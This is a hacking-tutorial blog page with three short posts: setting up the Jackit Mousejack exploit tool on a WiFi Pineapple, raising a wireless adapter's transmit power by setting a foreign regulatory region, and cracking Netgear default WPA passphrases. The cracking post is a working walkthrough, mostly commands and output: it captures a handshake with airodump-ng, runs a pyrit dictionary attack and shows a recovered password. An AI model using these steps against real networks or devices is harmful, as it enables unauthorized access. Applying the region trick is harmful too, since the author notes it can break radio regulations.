metalkey

Hacking tutorials + info

Mousejack on the WiFi Pineapple

June 15, 2018

The Mousejack attack is extremely useful for dropping payloads on machines where vulnerable RF wireless devices are used and after a bit of trial and error, it was possible to get the Jackit exploit tool running on a WiFi Pineapple.
Commands to get things up and running below.

Note: It is also possible to run Jackit on the Nano but it requires moving Python to an external SD card first.

root@pineapple:~$ opkg update
root@pineapple:~$ opkg install python-pip libusb-1.0 libusb-compat
root@pineapple:~$ pip install pyusb click six tabulate
...
Download jackit from https://github.com/Sliim/jackit/tree/openwrt-libusb
Modify jackit as per master...Sliim:openwrt-libusb (e.g. wget https://raw.githubusercontent.com/Sliim/jackit/4de42c5d9cdae2ed1009b8cd161101e88ab1c76a/jackit/lib/nrf24.py)
...
root@pineapple:~$ ./setup.py build
root@pineapple:~$ ./setup.py install

Jackit Github Page:
https://github.com/insecurityofthings/jackit

Tags: wifi

Increasing the Power Output of your Alfa AWUS036H

July 01, 2016 — metalkey
Warning: Check the laws in your region before adjusting the power output of your wifi adapter. Increasing the power above 20dBm can be a breach of regulations in some countries.

OS: Kali Linux

Checking the Current Power Output

In the example below Tx-Power is set to the default value of 20dBm for the current locale.
Information on how this value is determined is explained in-depth at Linux Wireless (http://linuxwireless.org/en/developers/Regulatory/)

root@kali:~$ iwconfig

wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

Increasing the Output to 1-Watt (30dBm)

To increase the power output of the Alfa AWUS036H to 1-Watt (manufacturer specified maximum) you will need to change your locale to a region with different regulations (e.g. Belize – BZ) and set txpower manually.

root@kali:~$ ifconfig wlan0 down
root@kali:~$ iw reg set BZ
root@kali:~$ iwconfig wlan0 txpower 30
root@kali:~$ ifconfig wlan0 up
root@kali:~$ iwconfig

wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=30 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

We have successfully set txpower to 30dBM (1-Watt).
Higher values can also be set and detailed instructions are available at Null Byte (http://null-byte.wonderhowto.com/how-to/set-your-wi-fi-cards-tx-power-higher-than-30-dbm-0149606/).

Tags: wifi

Netgear Wireless Router Default Passphrase Vulnerability

July 01, 2016 — metalkey

OS: Debian 8

A vulnerability exists in the default passphrase for Netgear Wireless Routers. The default passphrase consists of two words, followed by a three digit number (http://support1.gearguy.com/useruploads/images/19915v3.PNG):
word1word2xxx

To exploit this vulnerability you will need “aircrack-ng”, “pyrit” and the wordlist containing all possible passphrases. Initially, i was going to generate the dictionary using /usr/share/dict/cracklib-small and “crunch”, but the Netgear dictionary is already available for download from ScriptKitty (http://www.scriptkitty.ca/index.php/wordlists/).

Installation of Required Software

Manual step-by-step instructions @ blackMORE Ops (http://www.blackmoreops.com/2014/03/13/install-nvidia-driver-kernel-module-cuda-and-pyrit-kali-linux/)

user@debian8:~$ sudo apt-get install aircrack-ng
user@debian8:~$ sudo apt-get install pyrit

Step 1 – Capturing the Handshake

Plug in your Alfa AWUS036H and capture the 4-way handshake.
Tutorial @ SecurityTube - http://www.securitytube.net/groups?operation=view&groupId=9

user@debian8:~$ airmon-ng start wlan0
user@debian8:~$ airodump-ng mon0
user@debian8:~$ airodump-ng -c 1 -w netgear.cap --bssid 00:11:22:33:44:55 mon0

Step 2 – Cracking the Capture

Confirm you have useable handshakes, then clean up the capture file and crack the passphrase.

user@debian8:~$ pyrit -r netgear.cap analyze
user@debian8:~$ pyrit -r netgear.cap -o stripped-netgear.cap strip
user@debian8:~$ pyrit -r stripped-netgear.cap -i adjective_noun_3d.txt -b 00:11:22:33:44:55 attack_passthrough
...
Parsing file 'stripped-netgear.cap' (1/1)...
Parsed 10 packets (10 802.11-packets), got 1 AP(s)
Tried 12235614 PMKs so far; 25683 PMKs per second.
The password is 'magicalsquash835'

Solution

Never use the default passphrase provided with your router and always use complex passwords that do not follow predictable patterns.

Tags: wifi